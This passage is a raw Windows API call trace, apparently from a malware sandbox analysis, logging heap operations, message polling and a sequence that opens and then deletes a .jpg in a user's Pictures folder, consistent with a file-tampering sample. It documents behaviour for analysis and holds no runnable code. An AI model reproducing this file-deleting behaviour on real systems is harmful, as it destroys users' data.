lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.077] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.078] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.078] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\8tj3gtlol3fhi5e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0189.079] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.079] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.079] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.079] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.080] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.080] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.080] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.080] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.080] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.080] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0189.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.081] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.081] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.081] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFilePart=0x0) returned 0x58 [0189.081] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0x15ee4e60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0x90af58 [0189.082] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\8tj3gtlol3fhi5e.jpg")) returned 1 [0189.084] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0x15ee4e60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0 [0189.084] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.088] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.089] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.089] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.089] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.090] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0189.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.092] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.093] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0189.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.094] 